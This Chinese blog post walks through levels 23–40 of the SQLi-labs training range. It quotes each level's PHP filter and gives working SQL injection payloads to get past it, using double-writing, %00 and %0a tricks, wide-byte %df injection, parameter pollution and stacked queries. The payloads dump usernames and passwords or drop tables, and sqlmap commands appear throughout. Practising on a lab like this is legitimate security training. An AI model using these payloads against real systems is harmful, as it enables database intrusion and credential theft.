Sqllab靶场通关(23-40)

于 2024-07-14 00:15:00 发布
阅读量302 收藏 9
点赞数 24
文章标签: 数据库 oracle sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/140403024
版权

第23关

$reg = "/#/"; //这里过滤了#

$reg1 = "/--/"; //这里过滤了--

$replace = ""; //把他们都替换成了空

$id = preg_replace($reg, $replace, $id);

$id = preg_replace($reg1, $replace, $id);

对注释符号进行了正则替换

手工:

http://sql/Less-23/?id=-1' union select 1,database(),3 and '1' = '1

Sqlmap

python sqlmap.py -u http://sql/Less-23/?id=-1

第24关

二次注入:

可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户 输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。

查看原始用户数据

注册Dumb’#

密码:111

登录后重置密码

123

update users set password='123456'where username='Dummy'#'and password='123'

第25关

function blacklist($id)

{

$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)

$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)

return $id;

}

过滤了and和or

1、双写
因为后端and替换为空,并且只过滤一次,可以使用双写绕过
2、使用逻辑运算符
and对应的是&&,or对应的是||
3、url编码
and对应的机器语言是&&,如果&&无法绕过,可以试着利用&的url编码绕过,&&url编码为%26%26。

http://sql/Less-25/?id=-1'union select 1,group_concat(username,0x3a,passwoorrd),3 from users --+

双写绕过

Sqlmap

python sqlmap.py -u http://sql/Less-25/?id=1 --dbs

第25关a数字型闭合

http://sql/Less-25a/?id=-1 union select 1,group_concat(username,0x3a,passwoorrd),3 from users --+

Sqlmap

python sqlmap.py -u http://sql/Less-25a/?id=1 --dbs

第26关

function blacklist($id)

{

$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)

$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)

$id= preg_replace('/[\/\*]/',"", $id); //strip out /*

$id= preg_replace('/[--]/',"", $id); //Strip out --

$id= preg_replace('/[#]/',"", $id); //Strip out #

$id= preg_replace('/[\s]/',"", $id); //Strip out spaces

$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes

return $id;

}

Or and 注释符(url %00绕过)

?id=1' %26%26 extractvalue(1,concat(0x7e,database(),0x7e));%00

?id=1' %26%26 extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security') ,0x7e));%00

?id=1' %26%26 extractvalue(1,concat(0x7e,(select(group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema='security')),0x7e));%00

?id=1' %26%26 extractvalue(1,concat(0x7e,(select(group_concat(column_name)) from (infoorrmation_schema.columns) where (table_schema='security') aandnd (table_name='users')),0x7e));%00

?id=1' %26%26 extractvalue(1,concat(0x7e,(select (group_concat(username)) from (users)),0x7e));%00

 26a

(跟26差不多,就多了括号)只可以用盲注

第27关

?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))),1))or'0  爆表

?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(column_name))from(information_schema.columns)where(table_schema='security'and(table_name='users')))),1))or'0  爆字段

  

?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(password,username))from(users))),1))or'0  爆密码账户

第27a关

%0A代表换行符,不影响语句执行
%3a是冒号":"
%5c是“/”

?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand"1

?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(password,id,username)from%0Ausers%0Awhere%0Aid=3%0Aand"1

第28关

function blacklist($id)

{

$id= preg_replace('/[\/\*]/',"", $id);              //strip out /*

$id= preg_replace('/[--]/',"", $id);              //Strip out --.

$id= preg_replace('/[#]/',"", $id);                  //Strip out #.

$id= preg_replace('/[ +]/',"", $id);              //Strip out spaces.//$id= preg_replace('/select/m',"", $id);                //Strip out spaces.

$id= preg_replace('/[ +]/',"", $id);              //Strip out spaces.

$id= preg_replace('/union\s+select/i',"", $id);      //Strip out UNION & SELECT.return $id;

}

%00——注释符,双写绕过,%0a空格绕过(url绕过)

?id=1');%00   为闭合方式

http://sql/Less-28/?id=0') %0a unioN union%0a select %0a selecT %0a1,2,3;%00

?id=0') %0a unioN union%0a select %0a selecT %0a 1,2,(group_concat(table_name)) from (information_schema.tables) where (table_schema=database());%00

字段

?id=0') %0a unioN union%0a select %0a selecT %0a 1,2,(group_concat(column_name)) from (information_schema.columns) where (table_schema=database()) and (table_name='users') ;%00

字段值

?id=0') %0a unioN union%0a select %0a selecT %0a 1,(group_concat(username)),(group_concat(password)) from (users);%00

第28a关

和28关操作一致

第29关(基于'的http请求的参数污染注入 )

需要jspstudy搭建

updataxml(1,2,3)同上

库:?id=1’ and 1=updatexml(1,concat(0x7e,(select substring(database(),1,10))),3)--+

表:?id=1’ and 1=updatexml(1,concat(0x7e,(select substring(group_concat(table_name),1,23)from information_schema.tables where table_schema=database())),3)--+

字段:?id=1’ and 1=updatexml(1,concat(0x7e,(select substring(group_concat(column_name),1,30) from information_schema.columns where table_name='users' and table_schema='security')),3)--+

字段内容:?id=-1’ and 1=updatexml(1,concat(0x7e,(select substring(group_concat(username,'~',password),1,20)from users)),3)--+

第30关(基于"的http请求的参数污染注入 )

?id=1&id=-2"%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表

?id=1&id=-2"%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+   爆字段

?id=1&id=-2"%20union%20select%201,group_concat(password,username),3%20from%20users--+

第31关(基于")的http请求的参数污染注入 )

HPP 是 HTTP Parameter Pollution 的缩写,意思即“ HTTP 参数污染 ”。这个漏洞由 S.di Paola 与 L. Caret Toni 在 2009 年的 OWASP 上首次公布。这也是一种注入型的漏洞,攻击者通过在HTTP请求中插入特定的参数来发起攻击。如果Web应用中存在这样的漏洞,可以被攻击者利用来进行客户端或者服务器端的攻击。通过 HPP 参数污染可以实现绕过 waf 来进行攻击。

?id=1&id=-2")%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表

?id=1&id=-2")%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+   爆字段

?id=1&id=-2")%20union%20select%201,group_concat(password,username),3%20from%20users--+

第32关 宽字节绕过

注意到数据库使用了gbk编码。这里我们可以采用宽字节注入。当某字符的大小为一个字节时,称其字符为窄字节当某字符的大小为两个字节时,称其字符为宽字节。所有英文默认占一个字节,汉字占两个字节。

)输入’,被\转义

%df将\转义符号给吃了

?id=-1%df%27%20union%20select%201,database(),3%20--+

?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表

?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273--+   爆字段

?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

第33关 宽字节绕过

注意到数据库使用了gbk编码。这里我们可以采用宽字节注入。当某字符的大小为一个字节时,称其字符为窄字节当某字符的大小为两个字节时,称其字符为宽字节。所有英文默认占一个字节,汉字占两个字节。

)输入’,被\转义

%df将\转义符号给吃了

?id=-1%df%27%20union%20select%201,database(),3%20--+

?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表

?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273--+   爆字段

?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

第34关 宽字节绕过(POST)

抓包uname中进行宽字节绕过

第35关  表名hex编码

?id=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表

?id=-1%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273--+   爆字段

?id=-1%20union%20select%201,group_concat(password,username),3%20from%20users--+

第36关

使用mysql_real_escape_string函数对于特殊字符进行转义

%df将\转义符号给吃了

?id=-1%df%27%20union%20select%201,database(),3%20--+

?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表

?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273--+   爆字段

?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

第37关

宽字节加hex编码

1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+  爆字段名

1%df' union select 1,group_concat(password,username) from users--+ 爆密码账户

第38关

堆叠注入

?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() ;create table series38 like users--+

创建和users一样的表

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users';insert into series38 values(1,1,1)--+

插入数据1,1,1

 

?id=-1' union select 1,group_concat(username),group_concat(password) from users;drop table series38--+

删除表

第39关

堆叠注入

?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() ;create table series39 like users--+

创建和users一样的表

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users';insert into series39 values(1,1,1)--+

插入数据1,1,1

?id=-1' union select 1,group_concat(username),group_concat(password) from users;drop table series39--+

删除表

第40关

堆叠注入加上%00绕过注释符

?id=-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() ;create table series40 like users ;%00

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users';insert into series40 values(3,3,3);%00

?id=-1') union select 1,group_concat(username),group_concat(password) from users;drop table series40 ;%00

小春学渗透
关注
  • 24
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql靶场通关8-10
09-24
sql靶场8-10详解
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 1949
本文章主要是关于sqli-labs靶场1-20关的通关方法
sqllabs靶场通关记录
东隅的博客
09-25 447
id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='0' %23 跑出第一张表为emails,把后面的limit 1,1 一次次换,得到四张表。id=1' and and if(ascii(substring(database(),1,1))='110',sleep(5),1) %23 跑assic码,跑出来是security。
SQL-Labs靶场“21-25”关通关教程
热门推荐
钟言的博客
02-20 1万+
本篇为SQL-Labs靶场的21关到25关通关教程,详细内容包含了、二十一关 基于base64编码单引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 、二十二关 基于base64编码双引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 二十三关 基于GET过滤注释 1、源码分析 2、updatexml报错注入 3、联合查询注入 四、二+四关 基于POST存储型二次注入 1、源码分析 2、二次注入 五、二十五关 基于GET单引号OR、A等等
sqli-lab教程——1-35通关
缘木之鱼
05-08 5733
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges)Less-1 GET - Error...
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 5455
SQL注入从入门到进阶:sqli-labs全关通关笔记 Less-1~Less64
sqli-labs靶场23-38关)
weixin_51566481的博客
08-16 1161
sqli-labs,sql注入
SQL-Labs靶场“32-33”关通关教程
钟言的博客
03-14 5662
本篇为SQL-Labs靶场的第32关到33关的通关教程(宽字节注入),详细内容包含了、32关 GET单引号闭合宽字节注入 1、源码分析 2、宽字节注入原理 3、联合查询 4、updatexml报错注入 5、floor报错注入 、33关 GET单引号addslashes逃逸注入 1、源码分析 2、联合查询 3、updatexml报错注入 4、floor报错注入等内容
Sqli_labs通关全解--总结
cyynid的博客
01-09 2153
Sqli_labs通关全解
sql-labs通关教程
m0_62274649的博客
10-30 828
sqllabs搭建
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
纵横网络靶场资源题-过程详解
09-21
【网络靶场实战技巧与Wireshark流量分析】 在网络安全领域,网络靶场是一种重要的实践平台,它模拟真实的网络环境,让参与者通过解决各种安全挑战来提升技能。本篇文章主要探讨的是一个涉及到Wireshark流量分析的...
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
初始C++
2302_81016149的博客
07-08 809
在C语言我们学习函数的时候,我们学习过生命周期这个概念。那么,什么是生命周期呢?生命周期通常指的是一个对象或变量从创建到销毁所经历的时间段。那么,命名空间是什么?咱们可以这样理解:在这个空间的生命周期内,对这个空间内的全部标识符起一个名字,可对其进行引用,可类似与C语言中的结构体。#include<stdlib.h>//此处不包此头文件代码可正常运行,那该如何解决此处情况呢?int main()//此处编译不通过原因为:在不包头文件前为变量,包含后为函数。return 0;
set user & password for database 设置数据库 用户和密码
DavidsonGong的博客
07-12 104
USE sbms;
7.10飞书一面面经
东篱君的博客
07-10 1137
B+树的⾮叶⼦节点不存放实际的记录数据,仅存放索引,所以数据量相同的情况下,相⽐存储即存索引⼜存记录的 B 树,B+树的⾮叶⼦节点可以存放更多的索引,因此 B+ 树可以⽐ B 树更「矮胖」,查询底层节点的磁盘 I/O次数会更少。主从复制:单节点Redis的并发能力是有上限的,要进一步提高Redis的并发能力,可以搭建主从集群,实现读写分离。B+ 树有⼤量的冗余节点(所有⾮叶⼦节点都是冗余索引),这些冗余索引让 B+ 树在插⼊、删除的效率都更⾼,⽐如删除根节点的时候,不会像 B 树那样会发⽣复杂的树的变化;
Redis集群和高可用
最新发布
xiaogengtongxu的博客
07-13 309
主从架构无法实现master和slave角色的自动切换,即当master出现redis服务异常、主机断电、磁盘损坏等问题导致master无法使用,而redis主从复制无法实现自动的故障转移(将slave 自动提升为新master),需要手动修改环境配置,才能切换到slave redis服务器,另外当单台Redis服务器性能无法满足业务写入需求的时候,也无法横向扩展Redis服务的并行写入性能。master和slave角色的无缝切换,让业务无感知从而不影响业务使用。
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu --tables。 2. 然后,您可以使用以下命令来查询指定表名(例如users)的字段(例如username和password)并导出结果:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu -T users -C username,password --dump。 3. 如果您需要爆出数据库名为pikachu,您可以使用以下命令:a' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值